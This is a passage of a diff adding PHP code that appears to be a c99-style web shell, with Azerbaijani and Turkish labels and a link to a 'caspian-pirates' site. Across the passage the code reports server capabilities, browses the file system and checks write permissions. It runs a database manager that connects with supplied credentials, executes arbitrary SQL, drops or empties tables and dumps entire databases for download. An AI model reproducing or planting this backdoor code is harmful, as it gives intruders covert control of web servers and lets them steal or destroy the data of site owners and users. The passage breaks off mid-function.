+echo "<br/>cURL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>".(($curl_on)?("<font color=green>&#304;&#351;l&#601;yir</font>"):("<font color=red>&#304;&#351;l&#601;mir</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>&#304;&#351;l&#601;yir</font>";}else{$reg_g="<font color=red>&#304;&#351;l&#601;mir</font>";} echo("<b>Global Kayit&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:</b> $reg_g"); ?><?php echo "<br/>MySQL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>&#304;&#351;l&#601;yir</font>"; } else { echo "<font color=red>&#304;&#351;l&#601;mir</font>"; }
+echo "</b>";
+echo "<br/>MSSQL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>&#304;&#351;l&#601;yir</font>";}else{echo "<font color=red>&#304;&#351;l&#601;mir</font>";} ?><?php echo "<br/>PostgreSQL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>&#304;&#351;l&#601;yir</font>";}else{echo "<font color=red>&#304;&#351;l&#601;mir</font>";} ?><?php echo "<br/>Oracle&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>&#304;&#351;l&#601;yir</font>";}else{echo "<font color=red>&#304;&#351;l&#601;mir</font>";} ?> 
+		</b>&nbsp;</p><p align="left"><b>Qorunma&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;<?php echo $hsafemode; ?></b></p>
+			<p align="left">&nbsp;</p></font><font face='Tahoma' size='2'><p><a href="http://caspian-pirates.org/whois.php">
+			<font face="Tahoma">Serverdeki Saytlarin Siyahisi</font></a></p>
+  			</font><font face='Tahoma' size='1'><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ Ok! ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Sadece Okunabilir! ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+
+}
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center>
+			<font face="Tahoma"><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Baglanti Sihirbazi:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "Su anda baglanti y0k!";}
+  else {echo "<center><b>Baglanti yapilamiy0r!</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?></font><td width="28%" height="100" valign="top"><center>
+			<font size="5" face="Tahoma"><br/></font></center><li>
+			<font face="Tahoma">Database istifad&#601;&ccedil;i ad&#305; v&#601; &#351;ifr&#601;sini yaz&#305;n</font><li>
+			<font face="Tahoma">Databasa &#351;ifr&#601;sini v&#601; ad&#305;n&#305; yaz&#305;n</font><li>
+			<font face="Tahoma">Port N&ouml;mr&#601;si il&#601; oynamay&#305;n</font></td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>
+					&nbsp;<table><tr><td>
+				<font face="Tahoma"><b>Db istifad&#601;&ccedil;i Ad&#305;</b></font></td><td>
+				<font face="Tahoma"><b>DB Sifr&#601;si</b>&nbsp;</font></td><td>
+				<font face="Tahoma"><b>Database Adi</b>&nbsp;</font></td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td>
+					<b><font face="Tahoma">Server adl</font></b></td><td>
+					<font face="Tahoma"><b>Port No</b></font></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Baglan!"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //SoL panel basladi!
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>
+				<font face="Tahoma">Home</font></b></a><hr size="1" noshade>
+				<font face="Tahoma"><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?></font><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>
+				<font face="Tahoma">Home</font></b></a><hr size="1" noshade>
+				<font face="Tahoma"><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?></font><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade><font face="Tahoma">Please, select database</font><hr size="1" noshade><input type="submit" value="Go"></form>
+				<font face="Tahoma"><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?></font><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><font face="Tahoma"><b>Create a new table:</b>
+      </font>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"><font face="Tahoma">&nbsp;</font><input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><font face="Tahoma"><b>Dump DataBase:</b>
+      </font>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><font face="Tahoma">&nbsp;</font><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+				<font face="Tahoma"><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Indirme Hatas?! Bu dosya yazilabilir degil \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Indirildi! Yazilma basariyla tamamlandi \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Indirme: Indirilecek?</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
